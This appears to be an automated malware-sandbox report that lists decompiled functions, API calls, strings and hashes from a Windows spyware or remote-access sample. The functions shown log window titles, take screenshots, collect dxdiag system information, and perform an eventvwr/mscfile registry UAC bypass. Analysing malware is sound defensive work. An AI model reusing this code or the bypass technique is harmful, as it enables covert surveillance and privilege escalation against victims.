							 *_t112(0x465a60,  &_v24, 0x14, 0);
							_t108 =  &_v24;
							_t89 = 0;
							while(1) {
								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(0x465a74 + _t89));
								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(0x465a74 + _t89))) {
									break;
								}
								_t89 =  &(_t89->nLength);
								__eflags = _t89 - 8;
								if(_t89 != 8) {
									continue;
								} else {
									SetEvent( *0x46bea8);
								}
								break;
							}
							__eflags = WaitForSingleObject( *0x46bea8, 0x1f4);
							if(__eflags != 0) {
								_t43 =  *0x46bea8;
							} else {
								CloseHandle( *0x46bea8);
								_t43 = 0;
								goto L5;
							}
						}
						 *_t112(0x465a7c, 0, 0, 0);
						 *_t112(0, 0, 0);
						E10592EF2(0, _t115 - 0x18, 0x45f6bc);
						E10595912(0, 0x46ca18, _t108, _t122, 0xaa, 0x465a88);
						E10592D5E();
						goto L21;
					}
				}
				L21:
				return E10592D5E();
			}

0x105a783a
0x105a7844
0x105a7846
0x105a7854
0x105a7859
0x105a785f
0x105a786e
0x105a7876
0x105a7876
0x105a787d
0x105a7885
0x105a7887
0x105a7974
0x105a7976
0x00000000
0x105a797c
0x105a7986
0x105a798b
0x105a7995
0x105a7995
0x105a788d
0x105a788d
0x105a7892
0x105a789a
0x105a78a1
0x105a78a6
0x105a78a9
0x105a78b3
0x105a78e6
0x105a78eb
0x105a78f4
0x105a78fc
0x105a7904
0x105a790c
0x105a791f
0x105a7925
0x105a7933
0x105a7935
0x105a793f
0x105a794e
0x105a7958
0x105a795e
0x105a795e
0x105a795e
0x105a7a2f
0x105a7a2f
0x105a7a31
0x00000000
0x00000000
0x105a799f
0x105a79a5
0x105a79af
0x105a79b1
0x105a79b1
0x105a79b7
0x105a79bd
0x105a79c7
0x105a79c9
0x105a79c9
0x105a79db
0x105a79dd
0x105a79e5
0x105a79e7
0x105a79eb
0x105a79ee
0x00000000
0x00000000
0x105a79f0
0x105a79f1
0x105a79f4
0x00000000
0x105a79f6
0x105a79fc
0x105a79fc
0x00000000
0x105a79f4
0x105a7a13
0x105a7a15
0x105a7a2a
0x105a7a17
0x105a7a1d
0x105a7a23
0x00000000
0x105a7a23
0x105a7a15
0x105a7a3f
0x105a7a49
0x105a7a55
0x105a7a64
0x105a7a6c
0x00000000
0x105a7a6c
0x105a795e
0x105a7a71
0x105a7a7f

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 105A791F
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,0045F6BC), ref: 105A7958
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,0046C238), ref: 105A796E
SetEvent.KERNEL32 ref: 105A79FC
WaitForSingleObject.KERNEL32(000001F4), ref: 105A7A0D
CloseHandle.KERNEL32 ref: 105A7A1D

Strings

stopped, xrefs: 105A79E0
open ", xrefs: 105A78BC

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: Event$CloseCreateExistsFileHandleObjectPathSendSingleStringWait
String ID: open "$stopped
API String ID: 1811012380-2801388145
Opcode ID: 48db8bba4ea5dd42ea0582ef4651a692aab33a2f1f7291006520628776400043
Instruction ID: a29429e916a463a19575ade6573810d1cd8e089f0a177452485aa5e97708d23b
Opcode Fuzzy Hash: 48db8bba4ea5dd42ea0582ef4651a692aab33a2f1f7291006520628776400043
Instruction Fuzzy Hash: 2451B77560020DBFD704ABB4DC9ADFF3F2CEB80285B50412EF506961A1EFA15E46C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 00415938, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176
sleeptimeCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00415938() {
				intOrPtr* _t42;
				void* _t45;
				char* _t54;
				void* _t72;
				long _t78;
				void* _t83;
				struct _SECURITY_ATTRIBUTES* _t85;
				struct _SECURITY_ATTRIBUTES* _t92;
				void* _t131;
				void* _t132;
				void* _t140;
				void* _t141;
				void* _t146;
				intOrPtr _t147;
				void* _t148;
				void* _t149;
				void* _t150;

				E004510A8(E0045265E, _t146);
				_push(_t141);
				 *((intOrPtr*)(_t146 - 0x10)) = _t147;
				_t92 = 0;
				 *((intOrPtr*)(_t146 - 4)) = 0;
				_t149 =  *0x46bea0 - _t92; // 0x0
				if(_t149 == 0) {
					_t147 = _t147 - 0xc;
					_t131 = _t146 - 0x68;
					E004143BF(_t131);
					__imp__GdiplusStartup(0x46bea0, _t131, 0);
				}
				_t150 =  *0x46bd70 - _t92; // 0x0
				if(_t150 == 0) {
					E00401EFA(0x46c898, _t132, _t141, E00414E7E(_t146 - 0x40));
					E00401EF0();
				}
				_t42 = E00401F95(E00401E49(0x46c578, _t132, _t150, 0x19));
				_t45 = E00401EEB(E004172DA(_t146 - 0x58, E00401E49(0x46c578, _t132, _t150, 0x1a)));
				_t134 =  *_t42;
				E00401EFA(0x46c880,  *_t42, 0x46c880, E0041805B(_t146 - 0x40,  *_t42, _t45));
				E00401EF0();
				E00401EF0();
				CreateDirectoryW(E00401EEB(0x46c880), _t92);
				E00401F6D(_t92, _t146 - 0xb0);
				E00401F6D(_t92, _t146 - 0x80);
				 *(_t146 - 0x11) = _t92;
				 *0x46bd6b = 1;
				_t54 =  *((intOrPtr*)(_t146 + 8));
				_t145 =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				 *(_t146 - 0x18) =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				_t140 = Sleep;
				L6:
				while(1) {
					if( *_t54 != 1) {
						L11:
						GetLocalTime(_t146 - 0x28);
						_push( *(_t146 - 0x1c) & 0x0000ffff);
						_push( *(_t146 - 0x1e) & 0x0000ffff);
						_push( *(_t146 - 0x20) & 0x0000ffff);
						_push( *(_t146 - 0x22) & 0x0000ffff);
						_push( *(_t146 - 0x26) & 0x0000ffff);
						E00414398(_t146 - 0x2b8, _t145,  *(_t146 - 0x28) & 0x0000ffff);
						_t147 = _t147 + 0x20;
						E00401EFA(_t146 - 0x80, _t66, _t145, E004030A6(_t92, _t146 - 0x58, E004030A6(_t92, _t146 - 0x40, E00407514(_t146 - 0x98, 0x46c880, __eflags, "\\"), _t140, __eflags, _t146 - 0x2b8), _t140, __eflags, "."));
						E00401EF0();
						E00401EF0();
						E00401EF0();
						_t72 = E00401EEB(_t146 - 0x80);
						_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1));
						E0041576E(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1)), __eflags);
						__eflags =  *((char*)( *((intOrPtr*)(_t146 + 8))));
						if(__eflags != 0) {
							_t92 = 0;
							 *(_t146 - 0x11) = 0;
							_t78 = E00436769(_t75, E00401F95(E00401E49(0x46c578, _t134, __eflags, 0x18))) * 0x3e8;
							__eflags = _t78;
						} else {
							_t78 = E00436769(_t79, E00401F95(E00401E49(0x46c578, _t134, __eflags, 0x15))) * 0xea60;
						}
						Sleep(_t78);
						_t54 =  *((intOrPtr*)(_t146 + 8));
						continue;
					}
					_t145 = L"wnd_%04i%02i%02i_%02i%02i%02i";
					 *(_t146 - 0x18) = L"wnd_%04i%02i%02i_%02i%02i%02i";
					while(1) {
						_t153 = _t92;
						if(_t92 != 0) {
							goto L11;
						}
						_t83 = E00401F95(E00401E49(0x46c578, _t134, _t153, 0x17));
						_t148 = _t147 - 0x18;
						E0040427F(_t92, _t148, _t83);
						_t85 = E00417ABF(0, _t134);
						_t147 = _t148 + 0x18;
						_t92 = _t85;
						 *(_t146 - 0x11) = _t92;
						if(_t92 != 0) {
							goto L11;
						}
						Sleep(0x3e8);
					}
					goto L11;
				}
			}

0x0041593d
0x00415949
0x0041594b
0x0041594e
0x00415950
0x00415953
0x00415959
0x0041595b
0x0041595e
0x00415961
0x0041596f
0x0041596f
0x00415975
0x0041597b
0x0041598b
0x00415993
0x00415993
0x004159a8
0x004159c4
0x004159ca
0x004159dd
0x004159e5
0x004159ed
0x004159fb
0x00415a07
0x00415a0f
0x00415a14
0x00415a17
0x00415a28
0x00415a2e
0x00415a31
0x00415a34
0x00000000
0x00415a3a
0x00415a3d
0x00415a85
0x00415a89
0x00415a93
0x00415a98
0x00415a9d
0x00415aa2
0x00415aa7
0x00415ab5
0x00415aba
0x00415af9
0x00415b01
0x00415b09
0x00415b14
0x00415b1c
0x00415b24
0x00415b29
0x00415b36
0x00415b39
0x00415b57
0x00415b59
0x00415b70
0x00415b70
0x00415b3b
0x00415b4f
0x00415b4f
0x00415b78
0x00415b7a
0x00000000
0x00415b7a
0x00415a3f
0x00415a44
0x00415a47
0x00415a47
0x00415a49
0x00000000
0x00000000
0x00415a59
0x00415a5e
0x00415a64
0x00415a6b
0x00415a70
0x00415a73
0x00415a75
0x00415a7a
0x00000000
0x00000000
0x00415a81
0x00415a81
0x00000000
0x00415a47

APIs

__EH_prolog.LIBCMT ref: 0041593D
GdiplusStartup.GDIPLUS(0046BEA0,?,00000000), ref: 0041596F

Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F

Part of subcall function 0041576E: SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 004157C7
Part of subcall function 0041576E: DeleteFileW.KERNEL32(00000000,0000001B), ref: 00415858

CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004159FB
Sleep.KERNEL32(000003E8), ref: 00415A81
GetLocalTime.KERNEL32(?), ref: 00415A89
Sleep.KERNEL32(00000000,00000018,00000000), ref: 00415B78

Strings

time_%04i%02i%02i_%02i%02i%02i, xrefs: 00415A23
wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 00415A1E, 00415A3F, 00415AAD

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateSleep$DeleteDirectoryFileGdiplusH_prologLocalStartupStreamTimechar_traits
String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
API String ID: 3280235481-3790400642
Opcode ID: 03a048d13560f4f4eae294d81c30bb24aac51a1c54d7f120a5e1f9e58c173b69
Instruction ID: a88af923db25c08f263845cfd4b3868e06691e543411564c9f1a5e85300975ae
Opcode Fuzzy Hash: 03a048d13560f4f4eae294d81c30bb24aac51a1c54d7f120a5e1f9e58c173b69
Instruction Fuzzy Hash: 89517F70A002589ACB14BBB6CC529FE77699F54308F00003FF845AB1E2EF3C5E8587A9

Uniqueness

Uniqueness Score: -1.00%

Function 1059A003, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 156
sleepCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1059A003(void* __ecx, void* __edx) {
				char _v28;
				char _v56;
				char _v76;
				char _v80;
				char _v100;
				void* _v104;
				char _v108;
				char _v112;
				struct HWND__* _v116;
				void* __ebx;
				void* __edi;
				int _t36;
				struct HWND__* _t42;
				void* _t50;
				int _t57;
				struct HWND__* _t77;
				void* _t119;
				signed int _t126;
				void* _t128;

				_t112 = __edx;
				_t128 = (_t126 & 0xfffffff8) - 0x74;
				_push(_t77);
				_t119 = __ecx;
				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
					Sleep(0x1f4);
					_t77 = GetForegroundWindow();
					_t36 = GetWindowTextLengthW(_t77);
					_t4 = _t36 + 1; // 0x1
					E1059AC5A(_t77,  &_v100, _t112, _t119, _t4, 0);
					if(_t36 != 0) {
						_t57 = E105932F7();
						GetWindowTextW(_t77, E10592D59( &_v100), _t57);
						_t112 = 0x46dd0c;
						if(E1059AD1A(0x46dd0c) == 0) {
							E1059AC40(0x46dd0c,  &_v100);
							E105981AD(E105932F7() - 1);
							_t128 = _t128 - 0x18;
							_t137 =  *0x46c39b;
							if( *0x46c39b == 0) {
								_t112 = E1059ACD7( &_v76, 0x45f9a0, __eflags,  &_v108);
								E10593F14(_t77, _t128, _t67, _t119, __eflags, 0x45f994);
								E105999EE(_t119);
								E10592D5E();
							} else {
								E105981BE(_t77, _t128, 0x46dd0c, _t137,  &_v108);
								E1059A4A2(_t77, _t119, _t137);
							}
						}
					}
					_t83 = _t119;
					E1059AA83(_t119);
					if(E105A8044(_t119) < 0xea60) {
						L18:
						E10592D5E();
						continue;
					} else {
						_t77 = _v116;
						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
							_t42 = E105A8044(_t83);
							if(_t42 < 0xea60) {
								__eflags = _t77 % 0xea60;
								E105CC93C(_t83, _t77 / 0xea60,  &_v112, 0xa);
								_t50 = E105961B1(_t77,  &_v80, E10598430(_t77,  &_v56, 0x45f9bc, _t119, __eflags, E10592EF2(_t77,  &_v28,  &_v112)), _t119, __eflags, 0x45f9ac);
								_t128 = _t128 + 0xc - 0x14;
								_t112 = _t50;
								E105A8148(_t128, _t50);
								E105999EE(_t119);
								E10592E35();
								E10592E35();
								E10592E35();
								goto L18;
							}
							_t77 = _t42;
							_v116 = _t77;
							Sleep(0x3e8);
						}
						E10592D5E();
						break;
					}
				}
				__eflags = 0;
				return 0;
			}

0x1059a003
0x1059a009
0x1059a00c
0x1059a00f
0x1059a011
0x1059a070
0x1059a07c
0x1059a07f
0x1059a089
0x1059a091
0x1059a098
0x1059a0a2
0x1059a0b3
0x1059a0b9
0x1059a0c9
0x1059a0d5
0x1059a0e9
0x1059a0ee
0x1059a0f5
0x1059a0fc
0x1059a126
0x1059a12a
0x1059a132
0x1059a13b
0x1059a0fe
0x1059a101
0x1059a108
0x1059a108
0x1059a0fc
0x1059a0c9
0x1059a140
0x1059a142
0x1059a153
0x1059a1fb
0x1059a1ff
0x00000000
0x1059a159
0x1059a159
0x1059a15d
0x1059a16d
0x1059a174
0x1059a194
0x1059a197
0x1059a1c8
0x1059a1cd
0x1059a1d0
0x1059a1d4
0x1059a1db
0x1059a1e4
0x1059a1ed
0x1059a1f6
0x00000000
0x1059a1f6
0x1059a176
0x1059a17d
0x1059a181
0x1059a181
0x1059a20d
0x00000000
0x1059a20d
0x1059a153
0x1059a214
0x1059a21a

APIs

__Init_thread_footer.LIBCMT ref: 1059A065
Sleep.KERNEL32(000001F4), ref: 1059A070
GetForegroundWindow.USER32 ref: 1059A076
GetWindowTextLengthW.USER32(00000000), ref: 1059A07F
GetWindowTextW.USER32(00000000,00000000,00000000), ref: 1059A0B3
Sleep.KERNEL32(000003E8), ref: 1059A181

Part of subcall function 1059ACD7: char_traits.LIBCPMT ref: 1059ACE7

Part of subcall function 105999EE: SetEvent.KERNEL32(?,?,?,?,1059AB6A,?,?,?,?,?,00000000), ref: 10599A1B

Strings

[ , xrefs: 1059A11B
{ User has been idle for , xrefs: 1059A1B3

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
String ID: [ ${ User has been idle for
API String ID: 107669343-2826099043
Opcode ID: 1d10f816b4d0705a402c55ee7833fa14927a43ca18894bfe59249b7e6b762fd9
Instruction ID: f0dda9af3b36aabd1605fc0563ad3125f8a290807b47a7a0eb52c883e413bdca
Opcode Fuzzy Hash: 1d10f816b4d0705a402c55ee7833fa14927a43ca18894bfe59249b7e6b762fd9
Instruction Fuzzy Hash: 5651C375A047419BCB04EB64D88EA7E7FA9EFC4340F40052DF446862A1EF74BE49C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 0044FB34, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045067F), ref: 0044FB57

Strings

acos, xrefs: 0044FCCF
exp, xrefs: 0044FC1C, 0044FC7E
log, xrefs: 0044FBFD, 0044FC09
asin, xrefs: 0044FCC3
log10, xrefs: 0044FBA1, 0044FBF1
pow, xrefs: 0044FC3B, 0044FCE7, 0044FCFA
sqrt, xrefs: 0044FCDB

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 07e362d0d19a8e529bd48a8390fa6bde691843f4e6f9b00163a6e45181fcf7c8
Instruction ID: 6d1d00b5fa5106008f140815deedb413f1269aff938fee9e8c4187f401118692
Opcode Fuzzy Hash: 07e362d0d19a8e529bd48a8390fa6bde691843f4e6f9b00163a6e45181fcf7c8
Instruction Fuzzy Hash: A6515E70900A0DCBEF009F58E9885ADBBB4FB09305F6441A7D881A7755CB799D2D8B1E

Uniqueness

Uniqueness Score: -1.00%

Function 00413673, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 112
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00413673(void* __ecx, void* __eflags, char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v180;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t35;
				void* _t46;
				void* _t54;
				void* _t55;
				void* _t90;
				void* _t92;
				void* _t94;
				void* _t95;

				_t97 = __eflags;
				E004030A6(_t54,  &_v76, E0040427F(_t54,  &_v52, E0043987F(_t54, __ecx, __eflags, L"temp")), _t90, _t97, L"\\sysinfo.txt");
				E00401EF0();
				_t55 = 0;
				ShellExecuteW(0, L"open", L"dxdiag", E00401EEB(E00409E69( &_v52, L"/t ", 0,  &_v76)), 0, 0);
				E00401EF0();
				E004020D5(0,  &_v28);
				_t92 = 0;
				do {
					_t35 = E00401EEB( &_v76);
					_t87 =  &_v28;
					E004179DC(_t35,  &_v28);
					Sleep(0x64);
					_t92 = _t92 + 1;
				} while (E00409DB5() != 0 && _t92 < 0x4b0);
				if(E00409DB5() == 0) {
					DeleteFileW(E00401EEB( &_v76));
					E0040484E(_t55,  &_v180, 1);
					_t95 = _t94 - 0x10;
					_t93 = 0x46bacc;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t46 = E00404A08(_t87);
					_t102 = _t46;
					if(_t46 != 0) {
						_t93 = _t95 - 0x18;
						E00402F93(_t55, _t95 - 0x18, E00402FB7( &_v52,  &_a4, 0x46c238), _t102,  &_v28);
						_push(0x97);
						E00404AA4(_t55,  &_v180, _t49, _t102);
						E00401FC7();
						E00404E0B( &_v180);
						_t55 = 1;
					}
					E00404E2F(_t55,  &_v180, _t93);
				}
				E00401FC7();
				E00401EF0();
				E00401FC7();
				return _t55;
			}

0x00413673
0x0041369d
0x004136a6
0x004136ab
0x004136d4
0x004136dd
0x004136e5
0x004136ea
0x004136ec
0x004136ef
0x004136f4
0x004136f9
0x00413700
0x00413709
0x0041370f
0x00413725
0x00413734
0x00413742
0x00413747
0x00413752
0x00413757
0x00413758
0x00413759
0x0041375a
0x0041375b
0x00413760
0x00413762
0x0041376a
0x00413782
0x00413788
0x00413793
0x0041379b
0x004137a6
0x004137ab
0x004137ab
0x004137b3
0x004137b3
0x004137bb
0x004137c3
0x004137cb
0x004137d8

APIs

Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004136D4

Part of subcall function 004179DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9

Sleep.KERNEL32(00000064), ref: 00413700
DeleteFileW.KERNEL32(00000000), ref: 00413734

Strings

open, xrefs: 004136CE
\sysinfo.txt, xrefs: 0041367F
dxdiag, xrefs: 004136C9
temp, xrefs: 00413684
/t , xrefs: 004136B3

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleepchar_traits
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 2701014334-2001430897
Opcode ID: 73c228e22164e707defba6c5d99ea6be7ade642241f0467bdf332521333aaa0d
Instruction ID: f4a0078ff742d4c0d57fd8ead3e50225e02e9f8c908c9e0bc41a8f95a638bb01
Opcode Fuzzy Hash: 73c228e22164e707defba6c5d99ea6be7ade642241f0467bdf332521333aaa0d
Instruction Fuzzy Hash: 15316F719102095BCB14FBA5DC92AEE7735AF50308F40007FF905771D2EF785E498A99

Uniqueness

Uniqueness Score: -1.00%

Function 004062D8, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 106
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004062D8(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				void* _v20;
				long _v24;
				char _v48;
				char _v72;
				void _v100076;
				void* __ebx;
				void* _t37;
				WCHAR* _t39;
				long _t46;
				struct _OVERLAPPED* _t58;
				intOrPtr _t77;
				long _t81;
				void* _t82;
				void* _t84;
				void* _t87;

				E00450D30();
				_t74 =  &_a12;
				asm("xorps xmm0, xmm0");
				_v16 = __ecx;
				_t58 = 0;
				asm("movlpd [ebp-0x8], xmm0");
				_v24 = 0;
				E0040331A(0,  &_v48, __eflags, E00407514( &_v72,  &_a12, __eflags, L".part"));
				E00401EF0();
				_t37 = CreateFileW(E00401EEB( &_v48), 4, 0, 0, 2, 0x80, 0);
				_v20 = _t37;
				_t84 = _v8 - _a8;
				if(_t84 > 0) {
					L8:
					CloseHandle(_t37);
					_t39 = E00401EEB( &_a12);
					MoveFileW(E00401EEB( &_v48), _t39);
					_t58 = 1;
				} else {
					_t77 = _a4;
					if(_t84 < 0) {
						goto L3;
					} else {
						_t85 = _v12 - _t77;
						if(_v12 >= _t77) {
							goto L8;
						} else {
							while(1) {
								L3:
								_t46 = E00404B5A( &_v100076, 0x186a0);
								_t81 = _t46;
								asm("cdq");
								_v12 = _v12 + _t46;
								asm("adc [ebp-0x4], edx");
								WriteFile(_v20,  &_v100076, _t81,  &_v24, _t58);
								_t82 = _t82 - 0x18;
								E004020AB(_t58, _t82, _t74, _t85,  &_v12, 8);
								E00404AA4(_t58, _v16, _t74, _t85, 0x57, _v16);
								if(_t81 <= 0) {
									break;
								}
								_t87 = _v8 - _a8;
								if(_t87 < 0 || _t87 <= 0 && _v12 < _t77) {
									continue;
								} else {
									_t37 = _v20;
									goto L8;
								}
								goto L9;
							}
							CloseHandle(_v20);
							DeleteFileW(E00401EEB( &_v48));
						}
					}
				}
				L9:
				E00401EF0();
				E00401EF0();
				return _t58;
			}

0x004062e0
0x004062e9
0x004062ed
0x004062f0
0x004062f3
0x004062f5
0x00406302
0x0040630f
0x00406317
0x00406331
0x0040633a
0x0040633d
0x00406340
0x004063b2
0x004063b3
0x004063bc
0x004063cb
0x004063d1
0x00406342
0x00406342
0x00406345
0x00000000
0x00406347
0x00406347
0x0040634a
0x00000000
0x0040634c
0x0040634c
0x0040634c
0x0040635b
0x00406360
0x00406362
0x00406363
0x0040636a
0x00406379
0x0040637f
0x0040638a
0x00406394
0x0040639b
0x00000000
0x00000000
0x004063a3
0x004063a6
0x00000000
0x004063af
0x004063af
0x00000000
0x004063af
0x00000000
0x004063a6
0x004063ef
0x004063fe
0x004063fe
0x0040634a
0x00406345
0x004063d3
0x004063d6
0x004063de
0x004063eb

APIs

Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,[Info],00000000,0046C238,?,00406EAD,00000000), ref: 00406331
WriteFile.KERNEL32(?,?,00000000,00406EAD,00000000,?,000186A0,00406EAD,?,00406EAD,00000000,?,?,0000000A,00000000), ref: 00406379
CloseHandle.KERNEL32(00000000,?,00406EAD,00000000,?,?,0000000A,00000000), ref: 004063B3
MoveFileW.KERNEL32(00000000,00000000), ref: 004063CB
CloseHandle.KERNEL32(?,00000057,?,00000008,?,?,?,?,?,?,?,?,00000000), ref: 004063EF
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063FE

Strings

[Info], xrefs: 004062EC
.part, xrefs: 004062FA

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
String ID: .part$[Info]
API String ID: 820096542-3571004685
Opcode ID: 6bba8ed261c54de0a3e46f9af7c2b96e1411d84e0282c2609a9fbc3a0de2b4db
Instruction ID: 68dcce1d93323748b1337c278f552d509b85ae635904d8fd02d733045cb5952f
Opcode Fuzzy Hash: 6bba8ed261c54de0a3e46f9af7c2b96e1411d84e0282c2609a9fbc3a0de2b4db
Instruction Fuzzy Hash: E3314F71D00219ABCB00EFA5CC959EEB77DEF44345F10857AFD11B3191DA786A44CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405F77, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00405F77(void* __ebx, void* __ecx, void* __edx) {
				char _v28;
				char _v52;
				void* _t8;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;
				void* _t21;
				void* _t24;
				void* _t28;
				void* _t50;

				_t28 = __ecx;
				if( *0x46a9d0 != 0) {
					return 1;
				}
				_t8 = E00406115(__ecx);
				__eflags = _t8 - 0x3a9f;
				if(_t8 < 0x3a9f) {
					_push(_t28);
					E004108E2( &_v28, 0x80000000, "mscfile\\shell\\open\\command", 0x45f6bc);
					_t10 = E00402489();
					_t11 = E00401F95(0x46c560);
					_t12 = E00402489();
					_t14 = E00401F95( &_v28);
					E00410C80(E00401F95(0x46c518), __eflags, "origmsc", _t14, _t12 + 1, _t11, _t10);
					_push(2);
					E0040427F(__ebx, _t50 + 0x18 - 0x18, "C:\Windows\SysWOW64\DpiScaling.exe");
					_push(0x45f724);
					E00410B4C(0x80000001, L"Software\\Classes\\mscfile\\shell\\open\\command");
					E0041800F( &_v52, 0x34, "eventvwr.exe");
					_t21 = ShellExecuteW(0, L"open", E00401EEB( &_v52), 0x45f724, 0x45f724, 0);
					__eflags = _t21 - 0x20;
					if(_t21 <= 0x20) {
						E00401EF0();
						E00401FC7();
						_t24 = 2;
						return _t24;
					}
					ExitProcess(0);
				}
				return _t8;
			}

0x00405f77
0x00405f85
0x00000000
0x00405f89
0x00405f8f
0x00405f94
0x00405f99
0x00405f9f
0x00405fb2
0x00405fc0
0x00405fc8
0x00405fd1
0x00405fdb
0x00405ff2
0x00405ffa
0x00406006
0x00406015
0x0040601b
0x0040602a
0x00406046
0x0040604c
0x0040604f
0x0040605c
0x00406064
0x0040606b
0x00000000
0x0040606b
0x00406053
0x00406053
0x00406070

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 00406046
ExitProcess.KERNEL32 ref: 00406053

Strings

mscfile\shell\open\command, xrefs: 00405FA5
origmsc, xrefs: 00405FE1
open, xrefs: 0040603F
C:\Windows\SysWOW64\DpiScaling.exe, xrefs: 00406001
eventvwr.exe, xrefs: 00406020
Software\Classes\mscfile\shell\open\command, xrefs: 00406010

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExecuteExitProcessShell
String ID: C:\Windows\SysWOW64\DpiScaling.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
API String ID: 1124553745-1249179971
Opcode ID: 27e401ceed7da1652196baaf86b17bc50b6b95780435188a7ff36ccb26008351
Instruction ID: f05824e85f8be17fa5162dcfa478c8361fedc00b155675f1e07b0ba7c405f635
Opcode Fuzzy Hash: 27e401ceed7da1652196baaf86b17bc50b6b95780435188a7ff36ccb26008351
Instruction Fuzzy Hash: CE11F071A501056AD704B2A1CC57FBF36599B0470AF20003FF906BA1E3EFAC194986EF

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAF4, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040EAF4(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v12;
				char _v28;
				intOrPtr _v36;
				intOrPtr* _t34;
				void* _t39;
				intOrPtr* _t41;
				intOrPtr* _t42;

				E00430058( &_v12, 0);
				_t39 =  *0x46db88;
				_v8 = _t39;
				_t41 = E0040BA23(_a4, E0040B94C(0x46dd40));
				if(_t41 != 0) {
					L5:
					E004300B0( &_v12);
					return _t41;
				} else {
					if(_t39 == 0) {
						__eflags = E0040EBBB(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
						if(__eflags == 0) {
							_t9 =  &_v28; // 0x40e459
							_t34 = _t9;
							E0040B812(_t34);
							_t10 =  &_v28; // 0x40e459
							E0043205A(_t10, 0x46864c);
							asm("int3");
							_push(_t41);
							_t42 = _t34;
							E0040B6F3(_t34, _v36);
							 *_t42 = 0x454290;
							return _t42;
						} else {
